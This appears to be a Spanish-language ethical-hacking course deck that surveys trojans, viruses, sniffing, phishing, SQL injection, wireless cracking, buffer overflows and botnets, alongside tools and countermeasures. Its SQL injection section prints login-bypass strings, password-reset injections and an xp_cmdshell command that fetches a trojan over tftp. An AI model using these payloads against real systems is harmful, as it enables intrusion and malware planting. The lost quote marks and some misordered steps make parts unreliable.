Troyanos y Backdoors

Troyanos
Caballo de troya es un programa en el cual el codigo malicioso o perjudicial esta contenido dentro de programa inofensiva o datos de tal forma que se pueda obtener el control y elegir la forma de perjudicar, como ejecutar archivos en el disco duro.

Tipos de Troyanos
Acceso remoto Data-sending Destructivos DoS Proxy FTP Desabilitadores de los software de seguridad

Tipos clasicos de troyanos

Tini Icmd NetBus Beast MoSucker

Hacking Tools
Troyanos cautelosos HTTP RAT, shttpd trojan y badluck Troyanos de conexion inversa Cctt Diversos troyanos Donald Duck Recub

Diversos Troyanos
Backdoor.theef T2W Turkojan Biorante RAT Down Troj Poison Ivy Shark TYO

Security Tools
Netstat fPort TCPView Whats on my computer Process Viewer Super System Helper Tool Whats Running MSConfig Autoruns

Anti-Trojans Software
Trojan Hunter Comodo BOClean Trojan Remover Spyware Doctor Microsoft Windows Defender http://www.mosooft.com/cleaner.html

Virus y Gusanos

Virus
Un virus informtico es un programa o software que se auto ejecuta y se propaga insertando copias de s mismo en otro programa o documento.

Ciclo de Vida de un virus

Fase de Infeccion El Creador decide cuando infectar a la victima. Fase de Ataque A veces infectan al sistema, realizan actividades o intentado por el desarrollador

Gusanos
Un worm o gusano informtico es similar a un virus por su diseo, y es considerado una subclase de virus. Los gusanos informticos se propagan de ordenador a ordenador, pero a diferencia de un virus, tiene la capacidad a propagarse sin la ayuda de una persona.

Gusanos
Los gusanos se distinguen de los virus por el hecho que el virus requiere de intervencion humana, en cambio los gusanos no lo necesitan. Es un tipo de virus que puede replicarse y usar memoria pero no atacan a otros programas.

Clases de Virus
Lo que infecta Como Infectan

Clases de virus
System Sector or Boot Virus File Virus Macro Virus Source Code Virus Network Virus Stealth Virus Polymorphic Virus Cavity Virus Tunneling Virus Camouflage Virus

Virus y gusanos mas famosos

Virus I Love You Melissa Klez Virus Analysis 1 - 5 Gusano Slammer Gusano Spread of Slammer Gusano MyDoom

Top 10 de virus 2011

Metodos de deteccion de virus

Scanning Integrity checking Interception

Online Virus Testing: http://www.virustotal.com

Antivirus Software
AVG Antivirus Norton Antivirus McAfee Socketshield CA Anti-Virus F-Secure Kaspersky Anti-Virus Panda avast! Virus Cleaner AntiVir Personal Edition Bootminder Panda Active Scan

Hacking Web Servers

Web Servers
un servidor web sirve contenido esttico a un navegador, carga un archivo y lo sirve a travs de la red al navegador de un usuario. Este intercambio es mediado por el navegador y el servidor que hablan el uno con el otro mediante HTTP.

Vulnerabilidades
MisConfigurations en redes y S.O. Bugs en aplicaciones y S.O. Instalacion por defecto de Servidores Unpatch en aplicaciones y S.O. Carecer de politicas de seguridad, procedimientos y mantenimiento

Ataques a los WebServers

Man-in-the-middle Fuerza Bruta DNS cache poison DNS ingenieria social Servidor FTP Servidor de Correo Bugs en aplicaciones web Ataques en firewall Ataques en Router

Ataques a los WebServers

SQ Injection Intrusion SSH Intrusion Telnet URL Extensiones del servidor web Intrusion de servicio remoto

Hacking Tools
IISxploit.exe Msw3prt IPP RPC DCOM ASP Trojan IIS Logs (Log Analyzer, CleanIISLog)

Security Tools
Server Mask CacheRight CustomError HttpZip LinkDeny ServerDefender AI ZipEnable W3compiler Core Impact

Sniffers

Sniffing
Sniffing es una tecnologia de intercepcion de datos. Utiliza un programa o dispositivo que capture informacion vital del trafico de red.

Tipos de Sniffing
Sniffing pasivo Sniffing a traves de un hub Sniffing activo Sniffing a traves de un switch

Sniffing tools
Wireshark Pilot Windump/Tcpdump Sniffit Aldebaran Hunt NGSSniff Ntop Pf Iptraf Snort Iris Win Sniffer

Attacks
ARP Spoofing MAC Flooding DNS poisoning

Herramientas para ARP Spoofing

ARPspoof Ettercap arpSpyX Cain y Abel

Herramientas para MAC Flooding

Macof Etherflood

Sniffing Tools
Wireshark Etherape Tcpdump Sniffit Snort Windump/tcpdump Etherpeek Hunt NGSSniff Mac Changer Iris Ntop pf NetIntercept IPTraf WinDNSSpof

Detectar Sniffing
Necesita verificar cuales maquinas esta en modo promiscuo. Hay varios metodos para detectar un sniffer en una red: Metodo Ping Metodo ARP Metodo de Latencia Usando IDS

Contramedidas
Restringir el acceso fisic a los medios de red asegura que un sniffer no sea instalado. La mejor la forma de evitar el sniffing es usar la encriptacion. No previene un snifffer pero asegurara que el sniffer lea no esa importante.

Herramientas para detectar un sniffer

ARP watch Promiscan Antisniff Prodetect

Ingenieria Social

Ingenieria Social
Ingenieria social es el arte de convencer persona para obtener informacion confidencial. La ingeniera social es un mtodo basado en engao y persuasin, utilizado para obtener informacin significativa o lograr que la vctima realice un determinado acto.

Tipos de Ingenieria Social

Human-based Computer-based

Human-Based
Posicionarse como un legitimo usuario final. Posicionarse como un importante usuario. Posicionarse como un soporte tecnico.

Computer-Based
Mail/IM attachments Pop-Up windows Websites/Sweepstakes Spam mail Phishing

Recomendaciones para ataques internos

Separacion de responsabilidades Rotacion de responsabilidades Minimos privilegios Acceso controlado Logging and auditing Politicas legales Archivar datos criticos

Ataques y defensas de ingenieria social

Medios utilizados
Online Telefono Acceso personal Ingenieria social reversa

Pasos para defenderse

Desarrollar un security management framework Implementar un nivel de riesgo Implementar defensas de ingenieria social dentro de las politicas de seguridad

Factores de vulnerabilidad de las compaias

Insuficiente entrenamiento y vigilancia de la seguridad. Varias unidades organizacionales Falta de apropiadas politicas de seguridad Facilidad de acceso de la informacion ejemplo: email, numeros de telefono y numeros de empleado.

Fase de la ingenieria Social

Investigar una compaia Seleccionar la victima

Establecer una relacion

Obtener la informacion

Contramedidas
Entrenamiento Politicas de password Reglamentos operacionales Politicas de seguridad fisica Clasificacion de la informacion Privilegios de acceso

Phishing

Razones de phishing exitoso

Falta de conocimiento Engao visual No prestar la apropiada atencion a los indicadores de seguridad.

Metodos Phishing
Email y Spam Los Phishers envian millones de email procedentes de direcciones validas utilizando herramientas y tecnicas spammers. Web-based delivery Websites falsos

Metodos phishing
Hosts con troyanos Instalar troyanos que propagen emails y sitios web fraudulentos. IRC y IM informacion falsa y links

Proceso de phishing
Registrar un dominio falso

Crear un sitio parecido al sitio web original

Enviar email a muchos usuarios

Tipos de ataques phishing

Main-in-The-Middle Ofuscacion de la URL Cross-site Scripting Hidden Vulnerabilidades Client-side Malware-Based Phishing DNS-Based Phishing Content-Injection Phishing

Herramientas Anti-phishing
PhishTank NetCraft TrustWatch Toolbar

Phishing Sweeper Enterprise GFI MailEssentials

SQL Injection

Inyeccin de cdigo SQL

SQL injection es un tipo de security exploit en donde el atacante inyecta codigo SQL a traves de un input box de formularios web para obtener acceso a recursos o realizar cambios a los datos. Los programadores usan comandos secuenciales con input user, siendo mas facil para los atacantes inyectar comandos.

Tecnicas SQL injection

Autorizacion bypass Usando el comando SELECT Usando el comando INSERT Usando procedimientos almacenados

Como comprobar la vulnerabilidad

Utilizar una expresion en el input
Blah or 1=1 Login:blah or 1=1 Password:blah or 1=1 http://search/index.asp?id=blah or 1=1

Intente las siguientes posibilidades or 1=1 or a=a

ByPass
Original SQL query strQry = select count(*) FROM users WHERE Username= + txtUser.text+ AND Password= + txtpassword.text+; Cuando el usuario ingresa un usuario valido strQry = select count(*) FROM users WHERE Username=Admin AND Password=Admin;

ByPass
Cuando el atacante ingresa or 1=1 SELECT count(*) FROM users WHERE Username= or 1=1 AND Password= El resultado es equivalente a: SELECT count(*) FROM users WHERE Username= or 1=1

Utilizando procedimientos almacenados

Ejecutar aplicaciones Blah ;exec master..xp_cmdshell cmd.exe /c appname.exe - Actualizar un trojano en el servidor Blah ;exec master.xp_cmdshell tftp i 10.0.0.4 GET trojan.exe c:\trojan.exe--

Commandos Insert/Update
Update http:// xsecurity.com /index.asp?id=10; UPDATE admin_login SET password = newboy5 WHERE login_name=yuri Insert http:// xsecurity.com /index.asp?id=10; INSERT INTOadmin_login(login_id,login_name,pas sword,details) VALUES (111,yuri2,newboy5,NA)--

SQL injection Tools

SQLDict SqlExec SQLbf SQLSmack SQL2.exe AppDetective Database Scanner SQLPoke NGSSQLCrack NGSSQuirreL SQLPing v2.2

Blind SQL Injection

Blind SQL Injection es un metodo de hackeo que permite a un atacante no autorizado acceder a un servidor de base de datos.

Blind SQL Injection

Contramedidas La mejor proteccion es aislar la aplicacion web de SQL. Todas las sentencias requeridas por la aplicacion deberian estar almacenadas en procedimientos almacenados y matenerlas en el servidor.

Previniendo ataques SQL Injection

Minimizar los privilegios de conexiones de base de datos. Deshabilitar los mensajes de error. Proteger la cuenta del sistema sa. Nunca confie en el input user Nunca utlice SQL dinamicos Las excepciones deberian divulgar informacion minima

Hacking Redes Wireless

Wireless Networking
La tecnologia wireless esta incrementando su popularidad y al mismo tiempo se han introducido varios temas de seguridad. La popularidad de la tecnologia wireless esta conducida por dos factores primarios: conveniencia y costo.

Tipos de Redes Wireless

Peer-to-Peer Multiples puntos de acceso LAN-to-LAN wireless Network Extension a una Wired Network

Ventajas
Mobilidad Costo-efectivo en la fase inicial Facil conexion Diferentes formas de transferencia de datos Facil compartir

Desventajas
Mobilidad Alto costo despues de la implementacion No existe proteccion fisica de la red Hacking es mas conveniente El riesgo de compartir datos es alto

Estandares Wireless
802.11: primer estandar wireless 802.11a: mas canales, high speed, defacto standard 802.11b:protocolo de Wi-Fi, defacto standard 802.11g:similar al 802.11b, mas rapido 802.11i: seguridad WLAN mejorada 802.16: infraestructura wireless de larga distancia Bluetooth: opcion de remplazo de cable

Proceso de autenticacion 802.1X

Para que la autenticacion funcione en una red wireless, el AP debe estar disponible para identificar el trafico desde un particular cliente. Esta identificacion esta acompaada de la llave que es enviada al AP y al cliente wireless desde el servidor RADIUS.

Proceso de Autenticacion 802.1X

El AP emite una solicitud al cliente El AP genera una autenticacion con la clave de sesion y lo transmite a la estacion wireless

El cliente responde con su identidad

El servidor RADIUS envia una clave encriptada de autenticacion al AP

El AP envia la identidad al servidor RADIUS

La estacion wireles responde al servidor RADIUS con las credenciales via AP

SSID
El SSID es un idenficador unico que los dispositivos wireless utilizan para establecer y mantener la conectividad wireless Un SSID actua como un unico identificador compartido entre un punto de acceso y los clientes.

Dispositivos Wireless
Antena Puntos de acceso wireless Es una pieza del hardware de comunicacion wireless que crea un punto central de acceso de la conectividad wireless. Beacon frames Phone Jammers

Wired Equivalent Privacy (WEP)

Es un componente del estandar WLAN IEEE 802.11 El principal proposito es proporcionar confidencialidad de los datos en la red wireless

Wi-Fi Protected Access (WPA)

Es un metodo para encriptar datos basado en el estandar 802.11 Resuelve el emision de encabezados WEP debiles, el cual es llamado vector de inicializacion (IVs)

Wi-Fi Protected Access 2 (WPA2)

Es compatible con el estandar 802.11i Implementa el NIST con el algoritmo de encryptacion AES

Pasos para hacking wireless network

Encontrar las redes

Seleccionar la red para atacar

Analizar la red

Sniffear la red

Crakear la clave WEP

Craking WEP
Ataques Pasivos Le presencia del atacante no cambia e trafico, hasta que WEP haya sido crakeada. Ataques Activos Incrementa el riesgo de detectarse.

Herramientas WEP crackers

AiroPeek WEPCrack,AirSnort NetStumbler KisMAC Kismet AirCrack AirPcap Cain y Abel

Scanning Tools
PrismStumbler MacStumbler Mognet WaveStumbler AP Scanner Wireless Security Auditor AirTraf Wifi Finder eEye Retina WiFi

Sniffing Tools
AiroPeek NAI Wireless Sniffer WireShark VPNmonitorl Aerosol vxSniffer DriftNet WinDump ssidsniff

Wireless Security Tools

CommView for WiFi PPC AirMagnet Handheld Analyzer AirDefense Guard Google Secure Access

Buffer Overflows

Buffer overflows
Un desbordamiento de buffer ocurre cuando un buffer que tiene asignado un valor especifico, tiene mas datos copiado que los permitidos.

Tipos de buffer overflows

Stack overflow Un stack overflow ocurre cuando un buffer ha invadido el espacio del stack Heap overflows Un atacante provoca que un buffer para desbordar, situado en la parte mas baja sobreescriba otra variable dinamica.

Una vez que el stack ha fracasado

Una vez que el proceso vulnerable es comandado, el atacante tiene lo mismos privilegios como el proceso y puede obtener acceso. El/ella puede tener acceso a la vulnerabilidad para el acceso a superusuario.

Herramientas para defender buffer overflows

Return Address Defender (RAD) StackGuard Insure++ Comodo Memory Firewall DefensePlus BufferShield

Botnet

Botnet
Un botner consiste de un minimo de un bot server o controlador y uno o mas bot clients.

Ciclo de vida de un Botnet

Diseo y desarrollo Modificacion Implantacion

Declive / Inactividad

Explotacion

Botnets Comunes
SDBot Rbot Agobot Spybot Mytob

Deteccion de Botnets
Abuse E-mail

Infraestructura de Red
Deteccion de intrusos

Darknets,HoneyPots and other snares

Herramientas de deteccion de botnets

Otras Tecnicas
Prueba de Penetracin MAC OS X hacking Hacking mobile phone y PDA Bluetooth hacking VoIP hacking RFID hacking Spamming

Otras tecnicas
Hacking dispositivos USB Hacking database servers Filtrar contenido de Internet Privacidad en la Internet